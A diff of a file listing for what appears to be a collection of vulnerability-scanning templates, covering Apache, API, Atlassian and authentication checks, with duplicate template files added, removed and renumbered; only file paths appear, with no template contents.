./poc/apache/apache-drill-exposure.yaml
@@ -314,7 +311,6 @@
./poc/apache/apache-filename-brute-force-353.yaml
./poc/apache/apache-filename-brute-force.yaml
./poc/apache/apache-filename-enum.yaml
-./poc/apache/apache-flink-unauth-rce-355.yaml
./poc/apache/apache-flink-unauth-rce-356.yaml
./poc/apache/apache-flink-unauth-rce-357.yaml
./poc/apache/apache-flink-unauth-rce-358.yaml
@@ -335,7 +331,6 @@
./poc/apache/apache-httpd-cve-2021-40438-ssrf.yml
./poc/apache/apache-httpd-cve-2021-41773-path-traversal.yml
./poc/apache/apache-httpd-cve-2021-41773-rce.yml
-./poc/apache/apache-httpd-rce-362.yaml
./poc/apache/apache-httpd-rce-363.yaml
./poc/apache/apache-httpd-rce.yaml
./poc/apache/apache-impala.yaml
@@ -366,10 +361,11 @@
./poc/apache/apache-skywalking.yaml
./poc/apache/apache-solr-91-rce.yaml
./poc/apache/apache-solr-file-read-367.yaml
-./poc/apache/apache-solr-file-read-369.yaml
+./poc/apache/apache-solr-file-read-368.yaml
./poc/apache/apache-solr-file-read-370.yaml
./poc/apache/apache-solr-log4j-CVE-2021-44228.yaml
./poc/apache/apache-solr-log4j-cve-2021-44228.yaml
+./poc/apache/apache-solr-log4j-rce-372.yaml
./poc/apache/apache-solr-log4j-rce.yaml
./poc/apache/apache-solr-rce.yaml
./poc/apache/apache-solr-remotestreaming-anyfileread.yaml
@@ -404,7 +400,6 @@
./poc/apache/default-apache-test-all-6812.yaml
./poc/apache/default-apache-test-all-6813.yaml
./poc/apache/default-apache-test-all-6814.yaml
-./poc/apache/default-apache-test-all.yaml
./poc/apache/default-apache-test-page-6816.yaml
./poc/apache/default-apache-test-page-6817.yaml
./poc/apache/default-apache-test-page-6818.yaml
@@ -417,7 +412,6 @@
./poc/apache/default-apache2-ubuntu-page-6809.yaml
./poc/apache/default-apache2-ubuntu-page-6810.yaml
./poc/apache/default-apache2-ubuntu-page-6811.yaml
-./poc/apache/default-apache2-ubuntu-page.yaml
./poc/api/ApacheNifi-Api-UnauthorizedAccess.yaml
./poc/api/Discuz-info-api.yaml
./poc/api/Google-api.yaml
@@ -445,83 +439,81 @@
./poc/api/alfacgiapi-wordpress-257.yaml
./poc/api/alfacgiapi-wordpress-3.yaml
./poc/api/alfacgiapi-wordpress-4.yaml
-./poc/api/alfacgiapi-wordpress.yaml
./poc/api/apache-apisix-dashboard.yaml
./poc/api/apache-apisix-panel-336.yaml
-./poc/api/apache-apisix-panel-337.yaml
+./poc/api/apache-apisix-panel-338.yaml
./poc/api/apache-apisix-panel.yaml
./poc/api/apache-apisix.yaml
./poc/api/apache-nifi-api-unauthorized-access.yml
+./poc/api/api-abstractapi-383.yaml
./poc/api/api-abstractapi.yaml
-./poc/api/api-abuseipdb-384.yaml
-./poc/api/api-accuweather-386.yaml
-./poc/api/api-adafruit-io-387.yaml
+./poc/api/api-abuseipdb-385.yaml
+./poc/api/api-abuseipdb.yaml
+./poc/api/api-accuweather.yaml
+./poc/api/api-adafruit-io.yaml
./poc/api/api-aletheia.yaml
-./poc/api/api-alienvault-388.yaml
./poc/api/api-alienvault-389.yaml
./poc/api/api-alienvault-390.yaml
-./poc/api/api-apigee-edge-391.yaml
-./poc/api/api-appveyor-392.yaml
+./poc/api/api-apigee-edge.yaml
+./poc/api/api-appveyor.yaml
./poc/api/api-asana-393.yaml
./poc/api/api-aviationstack.yaml
./poc/api/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml
./poc/api/api-bearer-auth.yaml
-./poc/api/api-bible.yaml
+./poc/api/api-bible-394.yaml
./poc/api/api-bing-map-2018-bdd86a2dc395718687e612b89b6cd720.yaml
./poc/api/api-bing-map-2018.yaml
./poc/api/api-bingmaps-395.yaml
-./poc/api/api-bingmaps.yaml
./poc/api/api-bitly-396.yaml
-./poc/api/api-bitrise.yaml
-./poc/api/api-block-400.yaml
+./poc/api/api-bitrise-397.yaml
+./poc/api/api-block.yaml
./poc/api/api-blockchain-399.yaml
-./poc/api/api-blockchain.yaml
./poc/api/api-bravenewcoin.yaml
./poc/api/api-breezometer.yaml
./poc/api/api-buildkite-402.yaml
-./poc/api/api-buildkite.yaml
./poc/api/api-buttercms-403.yaml
./poc/api/api-calendly-404.yaml
./poc/api/api-carboninterface.yaml
./poc/api/api-circleci-405.yaml
./poc/api/api-circleci-406.yaml
-./poc/api/api-circleci.yaml
./poc/api/api-clearbit.yaml
./poc/api/api-climatiq.yaml
./poc/api/api-cloudmersive.yaml
-./poc/api/api-coinapi-408.yaml
+./poc/api/api-coinapi.yaml
./poc/api/api-cooperhewitt-410.yaml
./poc/api/api-cooperhewitt-411.yaml
./poc/api/api-covalent.yaml
./poc/api/api-dbt.yaml
-./poc/api/api-debounce-414.yaml
-./poc/api/api-deviantart.yaml
+./poc/api/api-debounce.yaml
+./poc/api/api-deviantart-415.yaml
./poc/api/api-dribbble-416.yaml
-./poc/api/api-dribbble.yaml
+./poc/api/api-dribbble-417.yaml
./poc/api/api-dropbox-418.yaml
./poc/api/api-endpoints.yaml
./poc/api/api-europeana-419.yaml
+./poc/api/api-europeana-420.yaml
./poc/api/api-europeana-421.yaml
./poc/api/api-facebook-422.yaml
-./poc/api/api-fastly.yml
-./poc/api/api-festivo.yaml
+./poc/api/api-fastly-424.yaml
+./poc/api/api-fastly.yaml
+./poc/api/api-festivo-425.yaml
./poc/api/api-fixer.yaml
./poc/api/api-fontawesome-426.yaml
./poc/api/api-fortitoken-cloud.yaml
./poc/api/api-front.yaml
-./poc/api/api-fullhunt-428.yaml
+./poc/api/api-fullhunt.yaml
./poc/api/api-github.yaml
./poc/api/api-gitlab-430.yaml
./poc/api/api-gitlab.yml
-./poc/api/api-google-drive.yaml
+./poc/api/api-google-drive-432.yaml
./poc/api/api-harvardart-434.yaml
./poc/api/api-harvardart.yaml
./poc/api/api-heroku.yaml
-./poc/api/api-hirak-rates-436.yaml
+./poc/api/api-hirak-rates.yaml
./poc/api/api-hubspot-437.yaml
-./poc/api/api-hubspot.yaml
./poc/api/api-iconfinder-438.yaml
-./poc/api/api-improvmx-440.yaml
+./poc/api/api-iconfinder-439.yaml
+./poc/api/api-improvmx.yaml
./poc/api/api-info-themes-plugins-wp-org-66caa0b56de1f5b395ccb9edd74d127d.yaml
./poc/api/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml
./poc/api/api-info-themes-plugins-wp-org-b2b4c6858b9f9bf1ce417b44adf44c1b.yaml
@@ -530,13 +522,13 @@
./poc/api/api-info-themes-plugins-wp-org-plugin.yaml
./poc/api/api-info-themes-plugins-wp-org.yaml
./poc/api/api-instagram.yaml
-./poc/api/api-instatus-442.yaml
-./poc/api/api-intercom.yaml
+./poc/api/api-instatus.yaml
+./poc/api/api-intercom-443.yaml
./poc/api/api-ipapi.yaml
-./poc/api/api-ipstack.yaml
+./poc/api/api-ipstack-444.yaml
./poc/api/api-iqair.yaml
-./poc/api/api-iterable.yaml
-./poc/api/api-jumpcloud.yaml
+./poc/api/api-iterable-445.yaml
+./poc/api/api-jumpcloud-446.yaml
./poc/api/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml
./poc/api/api-key-for-google-maps.yaml
./poc/api/api-keys.yaml
@@ -545,83 +537,75 @@
./poc/api/api-leanix.yaml
./poc/api/api-linkedin.yaml
./poc/api/api-linkfinder.yaml
-./poc/api/api-lokalise-452.yaml
+./poc/api/api-lokalise.yaml
./poc/api/api-loqate-453.yaml
-./poc/api/api-mailchimp-454.yaml
./poc/api/api-mailchimp.yaml
./poc/api/api-mailgun-455.yaml
./poc/api/api-malshare-456.yaml
-./poc/api/api-malwarebazaar-458.yaml
+./poc/api/api-malshare.yaml
./poc/api/api-malwarebazaar-459.yaml
./poc/api/api-mapbox-465.yaml
-./poc/api/api-mapbox.yaml
./poc/api/api-marketstack.yaml
./poc/api/api-mediastack.yaml
-./poc/api/api-mojoauth-466.yaml
+./poc/api/api-mojoauth.yaml
./poc/api/api-mywot-467.yaml
-./poc/api/api-mywot-468.yaml
./poc/api/api-nerdgraph-469.yaml
./poc/api/api-nerdgraph.yaml
-./poc/api/api-netlify-470.yaml
+./poc/api/api-netlify.yaml
./poc/api/api-npm-471.yaml
./poc/api/api-npm.yaml
./poc/api/api-onelogin.yaml
./poc/api/api-openweather-473.yaml
-./poc/api/api-openweather.yaml
./poc/api/api-optimizely-474.yaml
-./poc/api/api-pagerduty.yaml
+./poc/api/api-pagerduty-475.yaml
./poc/api/api-particle.yaml
./poc/api/api-pastebin-477.yaml
./poc/api/api-paypal-478.yaml
./poc/api/api-pendo-479.yaml
-./poc/api/api-petfinder.yaml
+./poc/api/api-pendo.yaml
+./poc/api/api-petfinder-480.yaml
./poc/api/api-pinata-481.yaml
-./poc/api/api-pivotaltracker.yaml
+./poc/api/api-pivotaltracker-482.yaml
./poc/api/api-positionstack.yaml
-./poc/api/api-postmark-483.yaml
./poc/api/api-postmark.yaml
./poc/api/api-quip-484.yaml
./poc/api/api-rate-limit-exceeded.yaml
./poc/api/api-reviewapi.yaml
./poc/api/api-rijksmuseum-485.yaml
-./poc/api/api-rijksmuseum.yaml
./poc/api/api-scanii-487.yaml
+./poc/api/api-scanii-488.yaml
./poc/api/api-screenshotlayer.yaml
./poc/api/api-seatgeek.yaml
-./poc/api/api-sendgrid-489.yaml
./poc/api/api-sendgrid.yaml
-./poc/api/api-slack-493.yaml
+./poc/api/api-slack.yaml
./poc/api/api-sonarcloud-494.yaml
+./poc/api/api-sonarcloud.yaml
./poc/api/api-sportdataapi.yaml
-./poc/api/api-spotify-495.yaml
-./poc/api/api-square-496.yaml
-./poc/api/api-sslmate-497.yaml
+./poc/api/api-spotify.yaml
+./poc/api/api-square.yaml
+./poc/api/api-sslmate.yaml
./poc/api/api-strava-498.yaml
-./poc/api/api-stripe-499.yaml
./poc/api/api-stripe.yaml
./poc/api/api-stytch.yaml
-./poc/api/api-taiga-501.yaml
-./poc/api/api-thecatapi-502.yaml
+./poc/api/api-taiga.yaml
./poc/api/api-thecatapi-503.yaml
-./poc/api/api-tink-504.yaml
+./poc/api/api-tink.yaml
./poc/api/api-tinypng-505.yaml
./poc/api/api-travisci-506.yaml
-./poc/api/api-travisci.yaml
./poc/api/api-twitter.yaml
./poc/api/api-urlscan-508.yaml
./poc/api/api-users-exposed.yaml
./poc/api/api-vercel.yaml
./poc/api/api-virustotal-511.yaml
./poc/api/api-virustotal-512.yaml
-./poc/api/api-visualstudio-513.yaml
+./poc/api/api-visualstudio.yaml
./poc/api/api-wakatime-514.yaml
+./poc/api/api-wakatime.yaml
./poc/api/api-weatherstack.yaml
./poc/api/api-webex-515.yaml
-./poc/api/api-weglot-516.yaml
./poc/api/api-weglot.yaml
-./poc/api/api-wordcloud-517.yaml
./poc/api/api-wordcloud-518.yaml
-./poc/api/api-youtube-519.yaml
+./poc/api/api-youtube.yaml
./poc/api/api-zenserp.yaml
./poc/api/api-zipcodebase.yaml
./poc/api/api2cart-bridge-connector-7f28d21ce1d1423f08ff3303e97fdcda.yaml
@@ -633,7 +617,6 @@
./poc/api/apilayer-caddy.yaml
./poc/api/apiman-panel-460.yaml
./poc/api/apiman-panel-461.yaml
-./poc/api/apiman-panel-462.yaml
./poc/api/apiman-panel-463.yaml
./poc/api/apisix-default-login-491.yaml
./poc/api/apisix-default-login-492.yaml
@@ -649,12 +632,10 @@
./poc/api/beamer-api-token.yaml
./poc/api/bems-api-lfi-707.yaml
./poc/api/bems-api-lfi-708.yaml
-./poc/api/bems-api-lfi-709.yaml
./poc/api/bems-api-lfi-710.yaml
./poc/api/bems-api-lfi-711.yaml
-./poc/api/bems-api-lfi-712.yaml
./poc/api/burp-api-detect-809.yaml
-./poc/api/burp-api-detect-812.yaml
+./poc/api/burp-api-detect-810.yaml
./poc/api/burp-api-detect-813.yaml
./poc/api/burp-api-detect.yaml
./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml
@@ -731,6 +712,7 @@
./poc/api/fastapi-3.yaml
./poc/api/fastapi-4.yaml
./poc/api/fastapi-5.yaml
+./poc/api/fastapi-docs-7398.yaml
./poc/api/fastapi-docs-7399.yaml
./poc/api/fastapi-docs.yaml
./poc/api/fastly-api-token.yaml
@@ -752,7 +734,6 @@
./poc/api/gitlab-user-open-api-7703.yaml
./poc/api/gitlab-user-open-api.yaml
./poc/api/gmail-api-client-secrets-7740.yaml
-./poc/api/gmail-api-client-secrets-7741.yaml
./poc/api/gmail-api-client-secrets.yaml
./poc/api/goSwaggerAPI.yaml
./poc/api/google-api(1).yaml
@@ -768,13 +749,13 @@
./poc/api/grafana-api-key-exposure.yaml
./poc/api/grafana_with_prometheus_api_proxy.yaml
./poc/api/graphql-apiforwp-detect.yaml
+./poc/api/graylog-api-browser-7846.yaml
./poc/api/graylog-api-browser-7847.yaml
./poc/api/graylog-api-browser-7848.yaml
-./poc/api/graylog-api-browser.yaml
./poc/api/hidden-api-endpoint-discovery.yaml
./poc/api/hidden-api-key-exposure.yaml
-./poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml
./poc/api/http-etcd-unauthenticated-api-data-leak-8057.yaml
+./poc/api/http-etcd-unauthenticated-api-data-leak.yaml
./poc/api/iis-enum-httpapi.yaml
./poc/api/jenkins-api-panel-8261.yaml
./poc/api/jenkins-api-panel-8262.yaml
@@ -796,12 +777,12 @@
./poc/api/k8s-apiserver-unauthorized.yaml
./poc/api/kube-api-deployments-8503.yaml
./poc/api/kube-api-deployments-8504.yaml
+./poc/api/kube-api-namespaces-8505.yaml
./poc/api/kube-api-namespaces-8506.yaml
./poc/api/kube-api-nodes-8507.yaml
-./poc/api/kube-api-nodes-8508.yaml
-./poc/api/kube-api-nodes.yaml
./poc/api/kube-api-pods-8509.yaml
./poc/api/kube-api-pods-8510.yaml
+./poc/api/kube-api-pods.yaml
./poc/api/kube-api-roles.yaml
./poc/api/kube-api-scan.yaml
./poc/api/kube-api-secrets-8511.yaml
@@ -815,15 +796,15 @@
./poc/api/magento-2-exposed-api-2.yaml
./poc/api/magento-2-exposed-api-3.yaml
./poc/api/magento-2-exposed-api-8687.yaml
+./poc/api/magento-2-exposed-api-8688.yaml
./poc/api/magento-2-exposed-api-8689.yaml
./poc/api/mailchimp-api-11854.yaml
./poc/api/mailchimp-api-key-8722.yaml
./poc/api/mailchimp-api-key-8723.yaml
./poc/api/mailchimp-api-key-8724.yaml
-./poc/api/mailchimp-api-key-8726.yaml
./poc/api/mailchimp-api-key.yaml
./poc/api/mailchimp-api.yaml
-./poc/api/mailgun-api-11855.yaml
+./poc/api/mailgun-api(1).yaml
./poc/api/mailgun-api.yaml
./poc/api/mapifylite-0f50434af4d25993907702f024089573.yaml
./poc/api/mapifylite-5337e2d76eda361e94ff056a55642367.yaml
@@ -919,17 +900,17 @@
./poc/api/strapi-cms-detect-10539.yaml
./poc/api/strapi-cms-detect-10540.yaml
./poc/api/strapi-cms-detect-10541.yaml
-./poc/api/strapi-documentation-10543.yaml
+./poc/api/strapi-documentation-10542.yaml
./poc/api/strapi-documentation.yaml
./poc/api/strapi-page-1.yaml
./poc/api/strapi-page-10544.yaml
+./poc/api/strapi-page-10545.yaml
./poc/api/strapi-page-10546.yaml
./poc/api/strapi-page-10547.yaml
./poc/api/strapi-page-2.yaml
-./poc/api/strapi-page.yaml
./poc/api/strapi-panel-10548.yaml
./poc/api/strapi-panel.yaml
-./poc/api/stripe-api-key-11869.yaml
+./poc/api/stripe-api-key(1).yaml
./poc/api/stripe-api-key.yaml
./poc/api/swagger-api-1.yaml
./poc/api/swagger-api-10.yaml
@@ -1012,14 +993,13 @@
./poc/api/swagger-api.yaml
./poc/api/tongda-api-ali-fileupload.yaml
./poc/api/tongda-oa-api-ali-upload.yaml
-./poc/api/twilio-api-10861.yaml
+./poc/api/twilio-api-10860.yaml
./poc/api/twilio-api.yaml
./poc/api/unauth-spark-api-10961.yaml
./poc/api/unauth-spark-api-10962.yaml
./poc/api/unauth-spark-api-10963.yaml
./poc/api/unauth-spark-api-10964.yaml
./poc/api/unauth-spark-api-10965.yaml
-./poc/api/unauth-spark-api.yaml
./poc/api/versa-director-api-detect.yaml
./poc/api/video-conferencing-with-zoom-api-075bf74052a0ad5436e52ba850a78457.yaml
./poc/api/video-conferencing-with-zoom-api-123050da768f674023e8ffc84b941d85.yaml
@@ -1038,7 +1018,6 @@
./poc/api/video-conferencing-with-zoom-api-plugin.yaml
./poc/api/video-conferencing-with-zoom-api.yaml
./poc/api/wadl-api-1.yaml
-./poc/api/wadl-api-11082.yaml
./poc/api/wadl-api-11083.yaml
./poc/api/wadl-api-11084.yaml
./poc/api/wadl-api-11085.yaml
@@ -1065,14 +1044,15 @@
./poc/api/wpgetapi.yaml
./poc/api/wsdl-api-11632.yaml
./poc/api/wsdl-api-11633.yaml
+./poc/api/wsdl-api-11634.yaml
./poc/api/wso2-apimanager-detect-11637.yaml
-./poc/api/wso2-apimanager-detect-11638.yaml
./poc/api/wso2-apimanager-detect-11639.yaml
./poc/api/wso2-apimanager-detect.yaml
./poc/api/yapi-detect-11719.yaml
./poc/api/yapi-detect-11720.yaml
./poc/api/yapi-detect-11722.yaml
./poc/api/yapi-rce-11724.yaml
+./poc/api/yapi-rce-11725.yaml
./poc/api/yapi-rce-11726.yaml
./poc/api/yapi-rce.yml
./poc/api/yapi-sql-inject.yaml
@@ -1083,12 +1063,12 @@
./poc/api/zentao-api-getModel-api-getMethod-filePath-Anyfileread.yaml
./poc/atlassian/Confluence-SSRF.yaml
./poc/atlassian/Confluence_CVE-2022-26134.yaml
+./poc/atlassian/atlassian-bamboo-panel.yaml
./poc/atlassian/atlassian-bamboo-setup-wizard.yaml
./poc/atlassian/atlassian-bamboo-version-detect.yaml
./poc/atlassian/atlassian-bitbucket-loginbypass.yaml
./poc/atlassian/atlassian-crowd-panel-580.yaml
./poc/atlassian/atlassian-crowd-panel-582.yaml
-./poc/atlassian/atlassian-crowd-panel-583.yaml
./poc/atlassian/atlassian-crowd-panel-584.yaml
./poc/atlassian/atlassian-crowd-panel-585.yaml
./poc/atlassian/atlassian-crowd-panel.yaml
@@ -1102,8 +1082,8 @@
./poc/atlassian/bitbucket-client-id.yaml
./poc/atlassian/bitbucket-client-secret.yaml
./poc/atlassian/bitbucket-public-repository.yaml
+./poc/atlassian/bitbucket-takeover-738.yaml
./poc/atlassian/bitbucket-takeover-739.yaml
-./poc/atlassian/bitbucket-takeover-740.yaml
./poc/atlassian/bitbucket-takeover-741.yaml
./poc/atlassian/bitbucket-takeover.yaml
./poc/atlassian/confluence-cve-2015-8399.yml
@@ -1114,15 +1094,15 @@
./poc/atlassian/confluence-dashboard.yaml
./poc/atlassian/confluence-detect-1.yaml
./poc/atlassian/confluence-detect-1186.yaml
-./poc/atlassian/confluence-detect-1187.yaml
./poc/atlassian/confluence-detect-1188.yaml
+./poc/atlassian/confluence-detect-1189.yaml
./poc/atlassian/confluence-detect-2.yaml
./poc/atlassian/confluence-detect-3.yaml
./poc/atlassian/confluence-detect-4.yaml
./poc/atlassian/confluence-detect.yaml
./poc/atlassian/confluence-ssrf-sharelinks-1190.yaml
./poc/atlassian/confluence-ssrf-sharelinks-1191.yaml
-./poc/atlassian/confluence-ssrf-sharelinks-1193.yaml
+./poc/atlassian/confluence-ssrf-sharelinks-1192.yaml
./poc/atlassian/confluence-ssrf-sharelinks-1194.yaml
./poc/atlassian/confluence-workflow-1195.yaml
./poc/atlassian/confluence-workflow.yaml
@@ -1136,7 +1116,7 @@
./poc/atlassian/jira-detect-1.yaml
./poc/atlassian/jira-detect-2.yaml
./poc/atlassian/jira-detect-3.yaml
-./poc/atlassian/jira-detect-8314.yaml
+./poc/atlassian/jira-detect-8313.yaml
./poc/atlassian/jira-detect-8315.yaml
./poc/atlassian/jira-detect-8316.yaml
./poc/atlassian/jira-detect.yaml
@@ -1158,11 +1138,11 @@
./poc/atlassian/jira-unauthenticated-dashboards-8327.yaml
./poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml
./poc/atlassian/jira-unauthenticated-installed-gadgets-8329.yaml
-./poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml
+./poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml
./poc/atlassian/jira-unauthenticated-popular-filters.yaml
-./poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml
./poc/atlassian/jira-unauthenticated-projectcategories-8333.yaml
./poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml
+./poc/atlassian/jira-unauthenticated-projectcategories.yaml
./poc/atlassian/jira-unauthenticated-projects-8335.yaml
./poc/atlassian/jira-unauthenticated-projects-8336.yaml
./poc/atlassian/jira-unauthenticated-resolutions-8337.yaml
@@ -1172,6 +1152,7 @@
./poc/atlassian/jira-unauthenticated-user-picker-8341.yaml
./poc/atlassian/jira-unauthenticated.yaml
./poc/atlassian/jira-workflow.yaml
+./poc/atlassian/jira_user_piker (copy 1).yaml
./poc/atlassian/jira_user_piker.yaml
./poc/atlassian/jirausername.yaml
./poc/atlassian/poc-yaml-Confluence-ognl-rce.yaml
@@ -1197,7 +1178,6 @@
./poc/auth/Discuz-unauthorized-tools.yaml
./poc/auth/DocCMS-keyword-SQL.yaml
./poc/auth/DocCMS-keyword-sqli.yaml
-./poc/auth/Dynatrace-token (copy 1).yaml
./poc/auth/Dynatrace-token.yaml
./poc/auth/EOffice_UserSelect_unauth.yaml
./poc/auth/E_cology-sqli-login.yaml
@@ -1240,6 +1220,7 @@
./poc/auth/Mallbuilder-smarty_config_key-SQLi.yaml
./poc/auth/Mallbuilder-sub_site_key-SQLi.yaml
./poc/auth/Mallbuilder-wap_key-SQLi.yaml
+./poc/auth/Mantis-Default_login.yaml
./poc/auth/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml
./poc/auth/Metinfo-login_check-SQLi.yaml
./poc/auth/MinIO-default-login.yaml
@@ -1257,7 +1238,6 @@
./poc/auth/PRTGNetwork-DefaultLogin.yaml
./poc/auth/Paypal-braintree-token.yaml
./poc/auth/Pictatic-API-key.yaml
-./poc/auth/Redmine-Default-Login.yaml
./poc/auth/SQL_injection-Authentification.yaml
./poc/auth/SSLSessionReq.yaml
./poc/auth/SSLv23SessionReq.yaml
@@ -1306,13 +1286,13 @@
./poc/auth/access-category-password.yaml
./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml
./poc/auth/accredible-certificates.yaml
-./poc/auth/acemanager-login-23.yaml
+./poc/auth/acemanager-login-24.yaml
./poc/auth/acemanager-login-25.yaml
./poc/auth/acemanager-login.yaml
-./poc/auth/activemq-default-login-44.yaml
./poc/auth/activemq-default-login-45.yaml
./poc/auth/activemq-default-login-46.yaml
./poc/auth/activemq-default-login-47.yaml
+./poc/auth/activemq-default-login-48.yaml
./poc/auth/activemq-default-password.yaml
./poc/auth/activemq-default-password.yml
./poc/auth/acumbamail-signup-forms-800304421471470ce44a3c0fd0b43721.yaml
@@ -1343,38 +1323,41 @@
./poc/auth/adobe-aem-default-credentials-9.yaml
./poc/auth/adobe-component-login-1.yaml
./poc/auth/adobe-component-login-2.yaml
-./poc/auth/adobe-component-login-90.yaml
+./poc/auth/adobe-component-login-89.yaml
+./poc/auth/adobe-component-login-91.yaml
./poc/auth/adobe-component-login-92.yaml
./poc/auth/adobe-component-login.yaml
-./poc/auth/adobe-connect-central-login-93.yaml
./poc/auth/adobe-connect-central-login-94.yaml
./poc/auth/adobe-connect-central-login-95.yaml
+./poc/auth/adobe-connect-central-login-96.yaml
./poc/auth/adobe-connect-central-login-97.yaml
./poc/auth/adobe-connect-central-login.yaml
-./poc/auth/adobe-experience-manager-login-105.yaml
+./poc/auth/adobe-experience-manager-login-106.yaml
./poc/auth/adobe-experience-manager-login-107.yaml
./poc/auth/adobe-experience-manager-login-108.yaml
./poc/auth/adobe-experience-manager-login-109.yaml
./poc/auth/adobe-experience-manager-login.yaml
./poc/auth/adobe-secret.yaml
-./poc/auth/aem-default-login-140.yaml
./poc/auth/aem-default-login-141.yaml
./poc/auth/aem-default-login-142.yaml
+./poc/auth/aem-login-status-167.yaml
./poc/auth/aem-login-status-168.yaml
-./poc/auth/aem-login-status-169.yaml
./poc/auth/aem-login-status-170.yaml
./poc/auth/aem-login-status-171.yaml
+./poc/auth/aem-secrets.yaml
./poc/auth/aem-sling-login.yaml
./poc/auth/afterlogic-webmail-login.yaml
./poc/auth/age-identity-secret-key.yaml
./poc/auth/age-recipient-public-key.yaml
./poc/auth/aic-intelligent-campus-system-password-leak.yaml
./poc/auth/aic-intelligent-password-leak.yaml
-./poc/auth/aims-password-mgmt-client-218.yaml
+./poc/auth/aims-password-mgmt-client-219.yaml
./poc/auth/aims-password-mgmt-client-220.yaml
+./poc/auth/aims-password-mgmt-client-221.yaml
./poc/auth/aims-password-mgmt-client.yaml
./poc/auth/aims-password-portal-222.yaml
./poc/auth/aims-password-portal-223.yaml
+./poc/auth/aims-password-portal-225.yaml
./poc/auth/aims-password-portal.yaml
./poc/auth/aircube-login.yaml
./poc/auth/airflow-default-credentials.yaml
@@ -1391,13 +1374,13 @@
./poc/auth/alibaba-canal-default-password.yaml
./poc/auth/alibaba-canal-default-password.yml
./poc/auth/alibaba-key-id.yaml
+./poc/auth/alibaba-mongoshake-unauth-268.yaml
./poc/auth/alibaba-mongoshake-unauth-269.yaml
./poc/auth/alibaba-mongoshake-unauth-270.yaml
./poc/auth/alibaba-nacos-v1-auth-bypass.yml
./poc/auth/alibaba-secret-id.yaml
./poc/auth/alphaweb-default-login-276.yaml
./poc/auth/alphaweb-default-login-277.yaml
-./poc/auth/alphaweb-default-login.yaml
./poc/auth/amazon-accesskey-bypass.yaml
./poc/auth/amazon-mws-auth-token-11845.yaml
./poc/auth/amazon-mws-auth-token-281.yaml
@@ -1409,8 +1392,8 @@
./poc/auth/amazon-sns-token.yaml
./poc/auth/ambari-default-credentials-286.yaml
./poc/auth/ambari-default-credentials.yaml
-./poc/auth/ambari-default-login-287.yaml
./poc/auth/ambari-default-login-288.yaml
+./poc/auth/ambari-default-login-289.yaml
./poc/auth/ambari-default-login-290.yaml
./poc/auth/ambari-default-password.yaml
./poc/auth/amcrest-login-297.yaml
@@ -1418,7 +1401,7 @@
./poc/auth/amcrest-login-299.yaml
./poc/auth/amcrest-login.yaml
./poc/auth/ametys-admin-login-300.yaml
-./poc/auth/ametys-admin-login-301.yaml
+./poc/auth/ametys-admin-login-302.yaml
./poc/auth/ametys-admin-login.yaml
./poc/auth/ampjuke-default-login.yaml
./poc/auth/anaqua-login-panel.yaml
@@ -1430,7 +1413,6 @@
./poc/auth/apache-couchdb-unauth.yaml
./poc/auth/apache-druid-unauth.yaml
./poc/auth/apache-dubbo-unauth.yaml
-./poc/auth/apache-flink-unauth-rce-355.yaml
./poc/auth/apache-flink-unauth-rce-356.yaml
./poc/auth/apache-flink-unauth-rce-357.yaml
./poc/auth/apache-flink-unauth-rce-358.yaml
@@ -1445,28 +1427,25 @@
./poc/auth/apache-tomcat-snoop-cookie-handling.yaml
./poc/auth/apc-login.yaml
./poc/auth/apc-ups-login-382.yaml
-./poc/auth/apc-ups-login.yaml
./poc/auth/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml
./poc/auth/api-bearer-auth.yaml
./poc/auth/api-fortitoken-cloud.yaml
./poc/auth/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml
./poc/auth/api-key-for-google-maps.yaml
./poc/auth/api-keys.yaml
-./poc/auth/api-mojoauth-466.yaml
+./poc/auth/api-mojoauth.yaml
./poc/auth/api-onelogin.yaml
./poc/auth/apisix-default-login-491.yaml
./poc/auth/apisix-default-login-492.yaml
./poc/auth/apollo-default-login-520.yaml
-./poc/auth/apollo-default-login-521.yaml
+./poc/auth/apollo-default-login.yaml
./poc/auth/apple-app-site-association-524.yaml
./poc/auth/apple-app-site-association-526.yaml
./poc/auth/apple-app-site-association.yaml
./poc/auth/appsmith-web-login.yaml
./poc/auth/arcgis-tokens.yaml
-./poc/auth/argocd-login-534.yaml
./poc/auth/argocd-login-535.yaml
-./poc/auth/argocd-login.yaml
-./poc/auth/arl-default-login-537.yaml
+./poc/auth/argocd-login-536.yaml
./poc/auth/arl-default-login-538.yaml
./poc/auth/arl-default-login-539.yaml
./poc/auth/arl-default-login-540.yaml
@@ -1486,7 +1465,6 @@
./poc/auth/atlassian-login-default.yaml
./poc/auth/atvise-login-589.yaml
./poc/auth/atvise-login-590.yaml
-./poc/auth/atvise-login.yaml
./poc/auth/auth token leake.yaml
./poc/auth/auth-header-manipulation.yaml
./poc/auth/auth-js.yaml
@@ -1500,6 +1478,7 @@
./poc/auth/auth0-e0dcfb20615268d5a66a83645978bad5.yaml
./poc/auth/auth0.yaml
./poc/auth/auth_header.yaml
+./poc/auth/authelia-panel.yaml
./poc/auth/authentic-8c2802cf9a9b808fbe84a5b3c21b5317.yaml
./poc/auth/authentic-b81cdffef50a03e77072606b54d17c70.yaml
./poc/auth/authentic-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -1538,22 +1517,22 @@
./poc/auth/auto-login-when-resister-2f930912217edb47a1b0335c7c11b347.yaml
./poc/auth/auto-login-when-resister.yaml
./poc/auth/avatier-password-management-604.yaml
-./poc/auth/avatier-password-management-605.yaml
-./poc/auth/avatier-password-management.yaml
+./poc/auth/avatier_password_management.yaml
./poc/auth/avigilon-login.yaml
./poc/auth/avtech-password-disclosure.yaml
./poc/auth/aws-access-key-value-622.yaml
./poc/auth/aws-access-key-value-623.yaml
+./poc/auth/aws-access-key-value-624.yaml
./poc/auth/aws-access-key-value-625.yaml
./poc/auth/aws-access-key-value.yaml
